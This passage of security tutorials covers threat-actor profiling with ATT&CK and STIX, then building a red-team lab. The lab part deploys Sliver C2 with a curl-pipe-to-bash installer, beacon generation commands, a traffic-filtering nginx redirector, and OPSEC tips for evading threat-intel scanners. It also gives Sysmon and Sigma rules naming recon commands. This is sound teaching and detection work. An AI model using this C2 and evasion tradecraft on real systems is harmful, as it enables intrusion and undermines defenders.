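# Pick the Enterprise collection by title instead of relying on list order
collection = next(c for c in server.api_roots[0].collections
                  if "enterprise" in c.title.lower())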
src = TAXIICollectionSource(collection)

group = src.query([Filter("type", "=", "intrusion-set"),
                   Filter("name", "=", "APT29")])[0]

for rel in src.relationships(group.id, "uses", source_only=True):
    if rel.target_ref.startswith("attack-pattern"):
        print(src.get(rel.target_ref).name)

8. ATT&CK Navigator Layers and Coverage Gap Analysis

The ATT&CK Navigator renders technique sets as a heatmap. Export a group’s techniques as a layer JSON, score each by observed frequency, and drag the file into the Navigator web app. Below is a v4 layer for a documented group.

{
  "name": "G0016 APT29 - Observed TTPs",
  "versions": { "attack": "14", "navigator": "4.9.1", "layer": "4.5" },
  "domain": "enterprise-attack",
  "techniques": [
    { "techniqueID": "T1566.001", "score": 5, "color": "#fc3b3b",
      "comment": "Spearphishing attachment - multiple campaigns" },
    { "techniqueID": "T1059.001", "score": 4, "color": "#fc6b3b",
      "comment": "PowerShell loaders" },
    { "techniqueID": "T1003.001", "score": 3, "color": "#fc9d3b",
      "comment": "LSASS credential access" }
  ],
  "gradient": {
    "colors": ["#ffffff", "#fc3b3b"], "minValue": 0, "maxValue": 5
  }
}

The power move is layer arithmetic: load the actor layer and your team’s detection coverage layer, then compute their difference. Techniques the actor uses that your sensors do not cover are your prioritized hardening backlog. Overlaying two actor layers instead reveals shared TTPs worth emulating once to cover multiple threats.
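
Layer arithmetic is ordinary set arithmetic on technique IDs, so it can also be done outside the Navigator UI. The sketch below assumes both layers are loaded as Python dicts in the layer format shown above; the coverage layer, the "score of at least 1 means covered" convention, and the helper names are assumptions.

```python
def technique_ids(layer, min_score=1):
    """Technique IDs in a layer whose score is at least min_score."""
    return {t["techniqueID"] for t in layer.get("techniques", [])
            if t.get("score", 0) >= min_score}


def gap_layer(actor, coverage):
    """Layer containing actor techniques that the coverage layer does not score."""
    gaps = technique_ids(actor) - technique_ids(coverage)
    layer = {k: actor[k] for k in ("versions", "domain") if k in actor}
    layer["name"] = f"Gap: {actor.get('name', 'actor')} not covered"
    layer["techniques"] = [t for t in actor.get("techniques", [])
                           if t["techniqueID"] in gaps]
    return layer


def shared(layer_a, layer_b):
    """Techniques present in both layers, e.g. two actors worth emulating once."""
    return sorted(technique_ids(layer_a) & technique_ids(layer_b))


actor = {"name": "G0016 APT29 - Observed TTPs", "domain": "enterprise-attack",
         "techniques": [{"techniqueID": "T1566.001", "score": 5},
                        {"techniqueID": "T1059.001", "score": 4},
                        {"techniqueID": "T1003.001", "score": 3}]}
# Hypothetical detection coverage layer; score 0 means no detection yet
coverage = {"name": "Detection coverage", "domain": "enterprise-attack",
            "techniques": [{"techniqueID": "T1059.001", "score": 1},
                           {"techniqueID": "T1003.001", "score": 0}]}

gap = gap_layer(actor, coverage)
print([t["techniqueID"] for t in gap["techniques"]])   # ['T1566.001', 'T1003.001']
```

Writing `gap` out with `json.dump` gives a file that can be loaded back into the Navigator for review, provided the `versions` block is carried over from a real export.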


9. Structuring the Profile in STIX 2.1

To make the profile machine-readable and shareable over TAXII, serialize it as STIX. Platforms such as MISP, OpenCTI, ThreatConnect, and Anomali ThreatStream ingest this directly.

STIX Object | Maps To
threat-actor | Actor identity, aliases, motivation, sophistication
intrusion-set | Named activity cluster (e.g., “APT29”)
attack-pattern | An ATT&CK technique via external_references
malware | Family with malware_types, is_family
tool | Legitimate software used offensively
campaign | A time-bounded activity cluster
indicator | A STIX pattern, e.g. [file:hashes.'SHA-256' = '...']
relationship (SRO) | Links SDOs (uses, attributed-to)

A trimmed example bundle follows. IDs are elided, and the created and modified timestamps that STIX 2.1 requires on each object are omitted for brevity.

{
  "type": "bundle", "id": "bundle--6f3a...",
  "objects": [
    { "type": "intrusion-set", "spec_version": "2.1",
      "id": "intrusion-set--1a2b...", "name": "APT29",
      "aliases": ["Cozy Bear"] },
    { "type": "attack-pattern", "spec_version": "2.1",
      "id": "attack-pattern--3c4d...", "name": "Spearphishing Attachment",
      "external_references": [
        { "source_name": "mitre-attack", "external_id": "T1566.001" } ] },
    { "type": "malware", "spec_version": "2.1",
      "id": "malware--5e6f...", "name": "WELLMESS",
      "is_family": true, "malware_types": ["backdoor"] },
    { "type": "relationship", "spec_version": "2.1",
      "id": "relationship--7a8b...", "relationship_type": "uses",
      "source_ref": "intrusion-set--1a2b...",
      "target_ref": "attack-pattern--3c4d..." }
  ]
}
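
A bundle like the one above can be assembled with the standard library alone, which makes the required common properties explicit. This is a sketch under assumptions: the `sdo` and `uses` helpers are hypothetical, the random UUIDs are for objects you author yourself (objects published by ATT&CK keep their published IDs), and a production pipeline would more likely use a validating STIX library.

```python
import json
import uuid
from datetime import datetime, timezone


def now() -> str:
    """UTC timestamp with millisecond precision and a 'Z' suffix."""
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"


def sdo(stix_type: str, **props) -> dict:
    """Build an object with the common properties every SDO and SRO carries."""
    ts = now()
    return {"type": stix_type, "spec_version": "2.1",
            "id": f"{stix_type}--{uuid.uuid4()}",
            "created": ts, "modified": ts, **props}


def uses(source: dict, target: dict) -> dict:
    """Relationship object linking source -> target with relationship_type 'uses'."""
    return sdo("relationship", relationship_type="uses",
               source_ref=source["id"], target_ref=target["id"])


group = sdo("intrusion-set", name="APT29", aliases=["Cozy Bear"])
technique = sdo("attack-pattern", name="Spearphishing Attachment",
                external_references=[{"source_name": "mitre-attack",
                                      "external_id": "T1566.001"}])
bundle = {"type": "bundle", "id": f"bundle--{uuid.uuid4()}",
          "objects": [group, technique, uses(group, technique)]}
print(json.dumps(bundle, indent=2))
```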

10. The Pyramid of Pain and Attribution Confidence

David Bianco’s Pyramid of Pain (2013) explains why TTP-based profiling outlasts IOC-based profiling. From the bottom (trivial for the adversary to change) to the top (expensive and painful):

  • Hash values → trivially recompiled
  • IP addresses → rotated in minutes
  • Domain names → re-registered cheaply
  • Network/host artifacts → moderate effort
  • Tools → significant rework
  • TTPs → the adversary must relearn how they operate

Profiling for the top of the pyramid forces the adversary to change behavior, not just infrastructure. That is the entire defensive case for TTP-centric profiles.
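
The pyramid also works as a sort key for a detection backlog. The sketch below ranks hypothetical detection ideas by the level they target; the short level names and the backlog entries are illustrative assumptions.

```python
# Pyramid of Pain levels from base (cheap to change) to apex (expensive to change)
PYRAMID = ["hash", "ip", "domain", "artifact", "tool", "ttp"]


def pain(kind: str) -> int:
    """1 = trivial for the adversary to change, 6 = most expensive."""
    return PYRAMID.index(kind) + 1


def prioritize(detections):
    """Order (name, kind) pairs so the most durable detections come first."""
    return sorted(detections, key=lambda d: -pain(d[1]))


# Hypothetical backlog entries
backlog = [("sha256 blocklist", "hash"),
           ("scheduled-task persistence analytic", "ttp"),
           ("C2 domain sinkhole", "domain"),
           ("loader YARA rule", "tool")]

for name, kind in prioritize(backlog):
    print(pain(kind), name)
```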

Treat attribution skeptically. Multiple vendors track overlapping activity under different names, and their group boundaries may disagree. Record an explicit confidence rating (Admiralty Code or an Assessed/Confirmed scale) per claim, and never collapse two vendor clusters into “the same actor” without corroboration.


Pyramid of Pain hierarchy from Hash Values at the base through IP Addresses, Domain Names, Artifacts, and Tools up to TTPs at the apex, with edge labels indicating the adversary cost to change each indicator type
Profiling for the apex of the Pyramid forces adversaries to change how they operate, not just which infrastructure they use — the core defensive argument for TTP-centric intelligence.

11. From Profile to Emulation Plan

The finished profile drives an emulation plan in the style of the CTID Adversary Emulation Library. Translate the TTP heatmap into a prioritized, sequenced scenario:

  • Sequence techniques along the Kill Chain, using ATT&CK tactics as the waypoints: initial access, execution, persistence, credential access, exfiltration.
  • Prioritize by impact, current detection coverage (from the Navigator gap analysis), and business relevance.
  • Constrain the plan to documented behaviors; emulate procedures, not improvised tradecraft.

The output is a runnable, scoped test that exercises exactly the techniques your real adversary uses — and validates the detections you built from the same profile.
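
The three rules above (sequence, prioritize, constrain) translate into a filter and two sorts. This is a minimal sketch: the `Step` fields, the 1 to 5 impact scale, and the sample values are assumptions, and the tactic list is limited to the stages named in this section.

```python
from dataclasses import dataclass

TACTIC_ORDER = ["initial-access", "execution", "persistence",
                "credential-access", "exfiltration"]


@dataclass
class Step:
    technique_id: str
    tactic: str
    impact: int        # analyst-assigned, 1 (low) to 5 (high); an assumed scale
    covered: bool      # True if the Navigator gap analysis shows a detection
    documented: bool   # True if the behavior appears in cited reporting


def build_plan(steps):
    """Keep documented behaviors only, then order them by tactic stage."""
    in_scope = [s for s in steps if s.documented and s.tactic in TACTIC_ORDER]
    return sorted(in_scope, key=lambda s: (TACTIC_ORDER.index(s.tactic),
                                           s.covered, -s.impact))


def focus(plan):
    """Uncovered steps ranked by impact: where detection work should start."""
    return sorted((s for s in plan if not s.covered), key=lambda s: -s.impact)


steps = [
    Step("T1003.001", "credential-access", 5, covered=False, documented=True),
    Step("T1566.001", "initial-access", 4, covered=True, documented=True),
    Step("T1059.001", "execution", 4, covered=False, documented=True),
    Step("T1053.005", "persistence", 3, covered=True, documented=True),
    Step("T1047", "execution", 2, covered=False, documented=False),  # excluded
]

plan = build_plan(steps)
print([s.technique_id for s in plan])         # ['T1566.001', 'T1059.001', 'T1053.005', 'T1003.001']
print([s.technique_id for s in focus(plan)])  # ['T1003.001', 'T1059.001']
```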


Left-to-right flow diagram from OSINT Collection through Adversary Dossier and STIX Serialization to Navigator Gap Analysis, then Emulation Plan and Detection Validation
The finished adversary profile feeds two parallel downstream pipelines — machine-readable STIX for TIP ingestion, and a Navigator gap layer that directly sequences the emulation test plan.

12. Common Attacker Techniques

A profile must capture what the adversary does during its own reconnaissance and resource development — the pre-attack behaviors you study and emulate.

Technique | Description
Gather identity information | Harvest credentials, emails, employee names (T1589)
Gather network information | Enumerate DNS, IP ranges, topology (T1590)
Gather org information | Identify roles, business tempo, relationships (T1591)
Gather host information | Fingerprint software, hardware, configs (T1592)
Search open websites | Social media, search engines, code repos (T1593)
Active scanning | Port, vulnerability, wordlist scanning (T1595)
Acquire / develop capabilities | Register infra, build or buy tooling (T1583, T1587, T1588)

13. Defensive Strategies & Detection

Profiling cuts both ways: detect adversaries profiling you, and validate coverage against a finished profile. Correlate weak recon signals across categories — perimeter scanning (T1595), web fingerprinting (T1592), and email harvesting (T1589) together indicate targeted pre-attack planning.

Detection Area | Specifics
Web server logs | Scanner user-agents (Masscan, ZGrab); sequential 404 bursts (T1595.003)
DNS monitoring | AXFR zone-transfer attempts; unusual PTR sweeps (T1590.002)
Honeytokens | Planted career-page emails that fire on first contact (T1589.002)
Cert Transparency | Alerts on lookalike-domain issuance (T1583/T1584)
Identity logs | Event ID 4624 correlated with 4662 for LDAP/AD enumeration
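
Correlating weak signals across these detection areas can be prototyped before committing to SIEM rules. The sketch below groups events by a correlation key and flags any key that shows several distinct recon techniques inside one time window. The key (a source label such as an IP), the 24-hour window, and the threshold of three categories are assumptions; real signals such as honeytoken hits may need a different join key.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def correlate(events, window=timedelta(hours=24), min_categories=3):
    """events: iterable of (timestamp, source, technique_id) tuples.

    Returns {source: sorted technique IDs} for sources that show at least
    min_categories distinct techniques within a single window.
    """
    by_source = defaultdict(list)
    for ts, src, tid in events:
        by_source[src].append((ts, tid))

    flagged = {}
    for src, items in by_source.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {tid for ts, tid in items[i:] if ts - start <= window}
            if len(seen) >= min_categories:
                flagged[src] = sorted(seen)
                break
    return flagged


# Hypothetical events using documentation-range addresses
events = [
    (datetime(2024, 5, 1, 10, 0), "203.0.113.7", "T1595"),   # perimeter scan
    (datetime(2024, 5, 1, 12, 0), "203.0.113.7", "T1592"),   # web fingerprinting
    (datetime(2024, 5, 2, 9, 0), "203.0.113.7", "T1589"),    # email harvesting
    (datetime(2024, 5, 1, 10, 5), "198.51.100.9", "T1595"),
    (datetime(2024, 5, 3, 10, 5), "198.51.100.9", "T1595"),
]
print(correlate(events))   # {'203.0.113.7': ['T1589', 'T1592', 'T1595']}
```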

Host-based recon once inside is visible to Sysmon: Event ID 1 (Process Create) catches nslookup, nltest, net view; Event ID 3 (Network Connection) surfaces internal scanning; Event ID 22 (DNS Query) enumerates lookups. Enable Audit Directory Service Access and command-line auditing (4688).

title: Domain Trust and Group Reconnaissance via Built-in Tools
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    CommandLine|contains:
      - 'nltest /domain_trusts'
      - 'net group "domain admins"'
      - 'net view /domain'
  condition: selection
level: medium

Centralize network, endpoint, identity, and threat-intel telemetry into one analytics platform, and ingest the profile’s STIX into a TIP (MISP/OpenCTI) so IOCs correlate against live data automatically. Reduce your OSINT attack surface: prune public DNS records, enable WHOIS privacy, and strip version banners.


14. Tools for Adversary Profiling

Tool | Description | Link
MITRE ATT&CK Navigator | Technique heatmaps and layer arithmetic | mitre-attack.github.io
mitreattack-python | Programmatic ATT&CK STIX queries | github.com
MISP | Threat-intel platform, STIX/TAXII ingestion | misp-project.org
OpenCTI | Knowledge graph for actors and TTPs | opencti.io
Shodan / Censys | Passive internet asset discovery | shodan.io
DomainTools / RDAP | WHOIS and passive DNS pivoting | domaintools.com
VirusTotal / MalwareBazaar | Tooling attribution from samples | virustotal.com

15. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Gather Victim Identity Information | T1589 | Honeytoken email triggers; phishing telemetry
Email Addresses | T1589.002 | Planted-address alerting
Gather Victim Network Information | T1590 | AXFR / PTR sweep monitoring
DNS | T1590.002 | Microsoft-Windows-DNS-Client ETW
Gather Victim Org Information | T1591 | LinkedIn exposure review
Gather Victim Host Information | T1592 | Web fingerprinting in server logs
Search Open Websites/Domains | T1593 | Code-repo secret scanning
Search Victim-Owned Websites | T1594 | Anomalous crawl patterns
Active Scanning | T1595 | Perimeter scan / 404 burst detection
Acquire Infrastructure | T1583 | Cert Transparency lookalike alerts
Compromise Infrastructure | T1584 | Passive DNS pivoting
Develop / Obtain Capabilities | T1587 / T1588 | Malware-repo attribution

Summary

  • An adversary profile is a structured, ATT&CK-mapped dossier of actor identity, targeting, tooling, and TTPs — the durable artifact IOC feeds cannot replace.
  • Run the six-phase intelligence lifecycle and fuse three frameworks: the Diamond Model for pivoting, the Kill Chain for sequencing, and ATT&CK for the TTP taxonomy.
  • Collect from vendor reports, government advisories, passive DNS, and malware repositories — and score every source with the Admiralty Code.
  • Serialize the result as STIX 2.1 and a Navigator layer so it feeds TIPs, gap analysis, and CTID-style emulation plans.
  • Detect adversaries profiling you with correlated recon signals — Sysmon Event IDs 1/3/22, honeytokens, and Cert Transparency monitoring — and profile for the top of the Pyramid of Pain, where changing TTPs costs the adversary the most.

Building a Red Team Lab: Infrastructure, VMs, and C2 Setup

Objective: Understand how to design, build, and operate a self-contained red team lab — hypervisor and VM selection, network segmentation, C2 framework deployment, redirector architecture, and OPSEC discipline — so authorized operators get a reproducible practice environment and defenders learn what adversary infrastructure looks like from the inside.


1. Lab Philosophy and Legal Guardrails

A red team lab exists for one reason: to test tradecraft against telemetry without touching production. Everything in this tutorial is for authorized testing inside an isolated environment you own. Never point lab C2 at systems outside your scope.

A dedicated lab gives you two things production cannot. First, repeatability — snapshot, detonate, revert, repeat. Second, observability — you run the blue stack and the red stack side by side and watch every event a real implant generates.

Two build models exist:

  • Air-gapped lab — host-only virtual networks with no internet. Safest for malware detonation and EDR-bypass study.
  • Cloud-backed lab — VPS-hosted team servers and redirectors for testing real callbacks, domain categorization, and redirector chains.

Most learners start air-gapped and graduate to a hybrid with a single controlled egress gateway.


2. Hardware and Hypervisor Selection

A workable lab runs on a single workstation. The constraint is RAM, because a Domain Controller, a Windows endpoint, a Linux target, and a SIEM run concurrently.

Component | Recommendation
Host RAM | 16 GB minimum, 32 GB+ for full AD + SIEM
Storage | 100 GB SSD minimum, 256 GB+ for multi-VM snapshots
CPU | Quad-core with virtualization extensions (VT-x/AMD-V)

Choose a Type-2 hypervisor:

Feature | VMware Workstation Pro | VirtualBox
Nested virtualization | Reliable | Limited
Advanced networking | LAN Segments | Internal Network
Snapshot fidelity | High | Adequate
Cost | Commercial | Free

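VMware Workstation Pro / Fusion is preferred for nested virtualization and snapshot fidelity; VirtualBox is the free, open-source alternative with less reliable advanced networking. Check current VMware licensing before budgeting: Broadcom made Workstation Pro and Fusion Pro free to use in 2024, so cost may no longer separate the two.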

Snapshot discipline is non-negotiable. Snapshot before each phase — a clean pre-exploitation baseline, a post-compromise state, a post-persistence state — so you can replay a scenario without rebuilding.


3. Network Architecture Design

Segment the lab into tiers so the attacker subnet, target subnet, and monitoring subnet cannot freely route to one another. This mirrors real network boundaries and forces realistic lateral movement.

Networking Mode | Behavior | Lab Use
Host-Only | Isolated subnet, no internet | Default for all tiers
NAT | VMs share the host IP outbound | Controlled egress only
LAN Segment / Internal | Inter-VM only, no host | Target-to-target traffic
Bridged | VM joins physical LAN | Avoid (leaks to real network)

Build three host-only segments: attacker, target, monitoring. A dedicated “egress” VM with dual NICs (one host-only, one NAT) acts as the only controlled gateway when you must test real C2 callbacks. The monitoring tier should receive logs one-way and remain unreachable from the attacker subnet.
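
Before building firewall rules, it helps to write the intended flow policy down and test it. The sketch below models the three tiers with the standard `ipaddress` module; the subnets and the allowed-flow set are hypothetical choices for illustration, not values taken from this lab.

```python
import ipaddress

# Hypothetical subnets, one per tier
TIERS = {
    "attacker":   ipaddress.ip_network("172.16.10.0/24"),
    "target":     ipaddress.ip_network("172.16.20.0/24"),
    "monitoring": ipaddress.ip_network("172.16.30.0/24"),
}

# Directed flows permitted between tiers: attacks reach targets,
# targets ship logs one-way to monitoring, nothing else crosses tiers
ALLOWED = {("attacker", "target"), ("target", "monitoring")}


def tier_of(ip: str):
    """Name of the tier containing ip, or None if it is outside the lab."""
    addr = ipaddress.ip_address(ip)
    for name, net in TIERS.items():
        if addr in net:
            return name
    return None


def flow_allowed(src: str, dst: str) -> bool:
    """True if traffic from src to dst is permitted by the tier policy."""
    s, d = tier_of(src), tier_of(dst)
    if s is None or d is None:
        return False
    return s == d or (s, d) in ALLOWED


def overlapping(tiers):
    """Pairs of tier names whose subnets overlap (should be empty)."""
    names = sorted(tiers)
    return [(a, b) for i, a in enumerate(names) for b in names[i + 1:]
            if tiers[a].overlaps(tiers[b])]


print(flow_allowed("172.16.10.5", "172.16.20.10"))   # True: attacker -> target
print(flow_allowed("172.16.10.5", "172.16.30.10"))   # False: attacker -> monitoring
print(flow_allowed("172.16.30.10", "172.16.20.10"))  # False: logs are one-way
print(overlapping(TIERS))                            # []
```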


Diagram showing three isolated host-only network tiers — attacker, target, and monitoring — connected through a dual-NIC egress VM acting as the sole gateway to the internet
Three-tier segmentation forces realistic lateral movement and keeps the monitoring subnet unreachable from the attacker tier.

4. Building the Target Network

The target network simulates a small enterprise: a Domain Controller, a domain-joined Windows endpoint, and a Linux host.

VM Role | OS | Purpose
Domain Controller | Windows Server 2019/2022 | AD DS, DNS, DHCP
Windows Target | Windows 10/11 (domain-joined) | Implant testing
Linux Target | Ubuntu / CentOS | Cross-platform implants

Promote the DC with AD DS, configure DNS, then join endpoints to the domain. The following script joins a Windows target, points DNS at the DC, and enables WinRM for management.

# Domain join + WinRM enablement for a lab Windows target
$DC = "192.168.56.10"     # Domain Controller IP
$Domain = "lab.local"

# Point DNS at the DC so domain resolution works
Set-DnsClientServerAddress -InterfaceAlias "Ethernet0" -ServerAddresses $DC

# Enable remote management for lab orchestration
Enable-PSRemoting -Force
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $DC -Force

# Join the domain with explicit domain credentials (Get-Credential prompts), then reboot
Add-Computer -DomainName $Domain -Credential (Get-Credential) -Restart

5. Deploying the Blue Team Monitoring Stack

The monitoring tier is what turns a playground into a detection lab. Deploy Wazuh or Security Onion as the SIEM/IDS, then instrument every Windows VM with Sysmon using a community config such as SwiftOnSecurity or Olaf Hartong’s sysmon-modular.

VM Role | OS | Purpose
Blue Team / SIEM | Security Onion / Wazuh | Log aggregation, IDS, alerting

Forward all Windows and Sysmon channels to the SIEM, enable real-time alerting, and leave Windows Defender enabled on targets so you can observe EDR behavior against your implants. Add Zeek for network metadata — its conn.log is invaluable for spotting beaconing.


6. C2 Framework Selection and Trade-offs

A C2 framework is the infrastructure used to control compromised systems remotely. It has three parts: a C2 server (backend), a C2 client (operator interface), and a C2 agent / implant (payload on the target).

Framework | License | Notes
Sliver | Open-source (Bishop Fox) | mTLS, HTTP/S, DNS, WireGuard transports; go-to Cobalt Strike alternative
Havoc | Open-source | Real-time client UI via API; Cobalt-Strike-like feel
Mythic | Open-source | Docker-based, web UI, pluggable C2 profiles and agents
Metasploit | Open-source | msfconsole, multi/handler; good for catching payloads, weak for long-haul
Cobalt Strike | Commercial (~$3,540/user/yr) | Malleable C2, Beacon, Aggressor Script; awareness only

Core architecture primitives apply across all of them:

Term | Definition
Team Server | Persistent backend; never directly internet-facing
Implant / Beacon / Agent | Payload on the target that calls back
Redirector | Disposable proxy in front of the team server; assumed to be burned
Listener | Server-side handler waiting for callbacks (e.g., HTTPS/443)
Malleable Profile | Config shaping HTTP/S traffic to mimic legitimate requests
Sleep / Jitter | Callback interval plus randomness; breaks beacon regularity

This tutorial uses Sliver as the primary example because it is free, modern, and well-documented at sliver.sh/docs.


7. Deploying Sliver C2

Install the server on a dedicated Ubuntu 22.04 host on the attacker tier. The team server should never be exposed directly — a redirector sits in front of it (Section 8).

# Install Sliver server (run on the dedicated C2 VM)
curl https://sliver.sh/install | sudo bash

# Run as a service so it survives reboots
sudo systemctl enable --now sliver

# Drop into the server console
sliver-server

Inside the console, start an HTTPS listener and generate a Windows x64 beacon. --skip-symbols speeds up builds in a lab; flags change between releases, so verify against the official docs.

# Start an HTTPS listener bound to the redirector-facing interface
https --lhost 192.168.56.20 --lport 443

# Generate a Windows x64 HTTPS beacon
generate beacon --http 192.168.56.20 --os windows --arch amd64 --skip-symbols

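# After the implant calls back (beacons check in asynchronously):
beacons                  # list active beacons; `sessions` lists interactive sessions only
use <beacon_id>          # interact with a beacon; tasks run on its next check-in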

The HTTP/S transport is shaped via /root/.sliver/configs/http-c2.json, which controls URIs, headers, and polling behavior. The default mTLS transport listens on 8888.


8. Redirector Architecture

A redirector is a disposable proxy that fronts the team server. Implants talk only to the redirector; if blue team burns its IP, you rebuild it and the long-term server stays hidden.

Implant → Redirector (Nginx/Apache/socat) → C2 Team Server

The redirector filters traffic: requests matching your implant’s expected path and user-agent are forwarded to the team server; everything else is dropped or returned as a benign error or redirected to a legitimate site.

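# Nginx redirector: forward only matching C2 traffic, 404 everything else
server {
    listen 443 ssl;
    server_name cdn.example-lab.local;

    # Placeholder lab certificate paths; nginx will not start a TLS listener without them
    ssl_certificate     /etc/nginx/tls/redirector.crt;
    ssl_certificate_key /etc/nginx/tls/redirector.key;

    location /api/v2/updates {
        # Only forward requests carrying the expected implant User-Agent
        if ($http_user_agent != "Mozilla/5.0 (Windows NT 10.0; Win64; x64)") {
            return 404;
        }
        proxy_pass https://192.168.56.20:443;   # team server listener address from Section 7
        proxy_ssl_verify off;                   # lab only: the listener uses a self-signed cert
    }

    # Anything else gets a flat 404, so the team server is never exposed
    location / {
        return 404;
    }
}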

For HTTPS redirectors use Apache, Nginx, or Caddy; for DNS redirectors use socat or iptables. In advanced cloud setups, CDN fronting via CloudFront, Azure CDN, or Cloudflare blends C2 with legitimate traffic. Do not deploy domain-fronting or malleable-profile code from a tutorial — reference framework docs.


Flow diagram showing an implant beaconing to a disposable redirector that filters traffic by path and user-agent, forwarding matched requests to the hidden team server and dropping or redirecting unmatched traffic to a decoy site
Redirectors act as disposable proxies so burning an IP never exposes the long-lived team server.

9. OPSEC and Infrastructure Hygiene

Your infrastructure is your OPSEC. A flat setup is a single point of failure that burns the whole operation.

  • Never connect the operator machine directly to the team server. Tunnel through a VPN overlay (WireGuard, Tailscale/Headscale) or a jump box.
  • Separate infrastructure for phishing, payload hosting, and C2 — three servers, three redirectors.
  • Use aged, categorized domains registered 30+ days prior with a benign-looking category.
  • Rotate redirector IPs and never reuse burned infrastructure.
  • Geofence access via Cloudflare so only the client’s country can reach C2 and campaign domains, blocking external threat-intel scanners.

A minimal operator WireGuard client routes only team-server traffic through the jump box:

# wg0.conf — operator client tunneling to the jump box
[Interface]
PrivateKey = <operator_private_key>
Address    = 10.10.10.2/32

[Peer]
PublicKey  = <jumpbox_public_key>
Endpoint   = jump.example-lab.local:51820
AllowedIPs = 10.10.10.0/24      # only the team-server subnet
PersistentKeepalive = 25

Relevant transports and ports:

Protocol | Port | C2 Use
HTTPS | 443 | Primary beacon transport
HTTP | 80 | Fallback / staging
DNS | 53 | Low-and-slow tunneling
SMB Named Pipe | 445 (via IPC$) | Lateral movement pivots
WireGuard | 51820 | Operator VPN overlay
mTLS | 8888 | Sliver default implant transport

Graph diagram showing an operator machine routing through a WireGuard jump box to three separate infrastructure components — C2 server, phishing server, and payload hosting — each isolated from one another
Separating C2, phishing, and payload infrastructure ensures a single burned server cannot compromise the entire operation.

10. Infrastructure-as-Code with Terraform

Terraform declares lab state in configuration, so a burned redirector is rebuilt in minutes. The example provisions a team server and a redirector, then bootstraps the server with remote-exec.

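terraform {
  required_providers {
    digitalocean = { source = "digitalocean/digitalocean" }
  }
}

# Hypothetical inputs: an SSH key already registered with DigitalOcean
variable "ssh_key_fingerprint"  { type = string }
variable "ssh_private_key_path" { type = string }

resource "digitalocean_droplet" "c2_server" {
  name     = "c2-teamserver"
  region   = "nyc3"
  size     = "s-2vcpu-4gb"
  image    = "ubuntu-22-04-x64"
  ssh_keys = [var.ssh_key_fingerprint]

  # remote-exec needs SSH connection details for the new droplet
  connection {
    type        = "ssh"
    host        = self.ipv4_address
    user        = "root"
    private_key = file(var.ssh_private_key_path)
  }

  provisioner "remote-exec" {
    inline = ["curl https://sliver.sh/install | sudo bash"]
  }
}

resource "digitalocean_droplet" "redirector" {
  name     = "c2-redirector"
  region   = "nyc3"
  size     = "s-1vcpu-1gb"
  image    = "ubuntu-22-04-x64"
  ssh_keys = [var.ssh_key_fingerprint]
}

output "c2_ip"         { value = digitalocean_droplet.c2_server.ipv4_address }
output "redirector_ip" { value = digitalocean_droplet.redirector.ipv4_address }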

terraform apply builds the stack and emits IPs; terraform destroy tears it down. Teardown-and-rebuild cycles keep infrastructure disposable.


11. Common Attacker Techniques

These are the primitives a lab is built to study and detect.

Technique | Description
HTTPS beaconing | Implant polls a redirector over 443 to blend with web traffic
DNS tunneling | Encodes C2 in DNS queries for low-and-slow egress
Redirector chaining | Disposable proxies hide the long-term team server
Domain fronting | CDN obfuscation routes C2 through trusted domains
Malleable profiles | Shape headers/URIs/jitter to mimic legitimate apps
SMB named-pipe C2 | Internal pivots over IPC$ for lateral movement
Ingress tool transfer | Implant downloads additional tooling to the target

12. Defensive Strategies and Detection

Run the same lab as blue team to build detections. Sysmon plus a tuned config surfaces nearly every C2 stage.

Event ID | Name | C2 Relevance
1 | Process Creation | Implant execution; check ParentImage, CommandLine, Hashes
3 | Network Connection | Connections to C2; DestinationIp, DestinationPort, Image
7 | Image Loaded | DLL loads by implant; Signed, Signature
8 | CreateRemoteThread | Injection; SourceImage → TargetImage
11 | FileCreate | Stager writes payload to disk
22 | DNSEvent | Beaconing via unusual or excessive QueryName
23 | FileDelete | Implant self-deletes after staging

Tune Sysmon to capture outbound connections on common C2 ports and DNS queries issued by shells. The fragment below matches on port alone, so excluding browsers is left to the downstream rule:

<RuleGroup name="C2 Network" groupRelation="or">
  <NetworkConnect onmatch="include">
    <DestinationPort condition="is">443</DestinationPort>
    <DestinationPort condition="is">53</DestinationPort>
  </NetworkConnect>
  <DnsQuery onmatch="include">
    <Image condition="end with">powershell.exe</Image>
    <Image condition="end with">cmd.exe</Image>
  </DnsQuery>
</RuleGroup>

A Sigma rule for beacon-like connections keys on Sysmon EventID 3, common C2 ports, and an allowlist of browsers. Correlate hits with short, regular intervals to catch low-jitter beacons.

title: Non-Browser Outbound to Common C2 Ports
logsource:
  product: windows
  service: sysmon
  category: network_connection
detection:
  selection:
    EventID: 3
    DestinationPort:
      - 443
      - 80
      - 53
    Initiated: 'true'
  filter_browsers:
    Image|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
  condition: selection and not filter_browsers
fields:
  - Image
  - DestinationIp
  - DestinationPort
  - DestinationHostname
level: high

Layer behavioral analytics on top:

  • Jitter analysis: alert on outbound HTTPS at regular intervals (e.g., 60 ± 5 s); Zeek conn.log excels at long-duration, low-byte sessions.
  • Named-pipe anomalies: Cobalt Strike’s default msagent_* pipe names appear in Sysmon EID 17/18.
  • Anomalous parent-child chains: WINWORD.EXE → cmd.exe → powershell.exe is a classic phishing chain.
  • User-agent mismatch: svchost.exe issuing a Chrome user-agent is anomalous.
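
Jitter analysis reduces to measuring how regular the gaps between connections are. A minimal sketch, assuming connection start times (in seconds) have already been extracted per source and destination pair, for example from Zeek conn.log: it computes the coefficient of variation of the inter-arrival gaps and flags low values. The 0.15 threshold and the minimum event count are assumptions to tune against your own baseline.

```python
from statistics import mean, pstdev


def beacon_score(timestamps, min_events=6):
    """Coefficient of variation of inter-arrival gaps, or None if not measurable."""
    ts = sorted(timestamps)
    if len(ts) < min_events:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    if avg == 0:
        return None
    return pstdev(gaps) / avg


def looks_like_beacon(timestamps, max_cv=0.15):
    """True when callbacks are regular enough to resemble a low-jitter beacon."""
    cv = beacon_score(timestamps)
    return cv is not None and cv <= max_cv


regular = [0, 60, 121, 179, 240, 302, 360]      # roughly 60 s with small jitter
bursty = [0, 5, 200, 210, 900, 905, 3000]       # human-like browsing pattern

print(looks_like_beacon(regular))   # True
print(looks_like_beacon(bursty))    # False
```

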